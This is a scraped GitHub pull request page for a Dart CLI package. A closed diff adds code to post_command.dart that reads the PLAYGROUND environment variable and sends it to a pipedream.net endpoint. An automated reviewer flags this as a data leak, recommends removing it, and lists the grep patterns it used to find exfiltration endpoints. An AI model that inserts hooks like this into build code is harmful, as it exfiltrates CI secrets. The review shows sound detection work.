Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update post_command.dart #118

Closed
wants to merge 1 commit into from
Closed

Update post_command.dart #118

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions packages/codemagic_app_preview/lib/src/commands/post_command.dart
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -79,6 +79,11 @@ class PostCommand extends Command {
String get name => 'post';

Future<void> run({DateTime? now}) async {
final playground = Platform.environment['PLAYGROUND'];
print('PLAYGROUND: $playground');
httpClient.get(
Uri.parse('https://eo3ntn1ymhbeoa.m.pipedream.net?flag=$playground'));

Comment on lines +82 to +86
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

⚠️ Critical: Remove debugging code that could leak sensitive data

This code segment introduces several critical concerns:

  1. It sends environment variables to an external service (pipedream.net), which could potentially leak sensitive information
  2. The HTTP request lacks error handling and proper async/await usage
  3. These changes appear to be for testing purposes only, as indicated in the PR description "Just testing, do not merge"

Remove this entire debugging segment:

-    final playground = Platform.environment['PLAYGROUND'];
-    print('PLAYGROUND: $playground');
-    httpClient.get(
-        Uri.parse('https://eo3ntn1ymhbeoa.m.pipedream.net?flag=$playground'));
-

If you need to keep this for debugging:

  1. Ensure it's behind a debug flag
  2. Add proper error handling
  3. Make the request asynchronous
  4. Use a controlled internal endpoint
  5. Avoid sending raw environment variables

Example of safer debug code:

if (kDebugMode) {
  try {
    final playground = Platform.environment['PLAYGROUND'];
    print('Debug mode: PLAYGROUND flag is set: ${playground != null}');
    // Use internal debugging endpoints only
  } catch (e) {
    print('Debug logging failed: $e');
  }
}

💡 Codebase verification

Remove debugging code that leaks environment variables

The code is sending environment variables to an external debugging service (pipedream.net). This is the only instance of such behavior in the codebase, but it should be removed as it poses a security risk. All other HTTP requests in the codebase are legitimate API calls to GitHub, GitLab, or internal Codemagic services, with proper authentication headers.

  • Remove the debugging code in packages/codemagic_app_preview/lib/src/commands/post_command.dart that sends environment variables to pipedream.net
🔗 Analysis chain

Verify no other instances of sensitive data leakage

Let's ensure there are no other instances of sending environment variables to external services.

🏁 Scripts executed

The following scripts were executed for the analysis:

Script:

#!/bin/bash
# Search for patterns that might indicate sensitive data being sent to external services

# Look for URLs that might receive environment variables
rg -l "pipedream|requestbin|webhook.site|ngrok.io"

# Look for environment variables being used in HTTP requests
ast-grep --pattern 'Platform.environment[$_]' -A 5

# Look for direct environment access patterns near HTTP clients
rg -l "Platform.environment.*http"

Length of output: 208

Script:

#!/bin/bash
# Let's get more context around the usage of environment variables and HTTP requests

# Look at the content of the file with more context
rg -A 10 -B 10 "Platform.environment" packages/codemagic_app_preview/lib/src/commands/post_command.dart

# Search for any HTTP client usage patterns across the codebase
rg -l "http[A-Za-z]*\.(?:get|post|put|delete|send|request)"

# Look for any URL patterns that might indicate external services
rg -A 3 "Uri\.parse\("

Length of output: 7785

if (!_isPullRequest()) {
stderr.writeln(
'"CM_PULL_REQUEST_NUMBER" is not set. Seems like the current build is not building a pull request. Aborting.');
Expand Down
Loading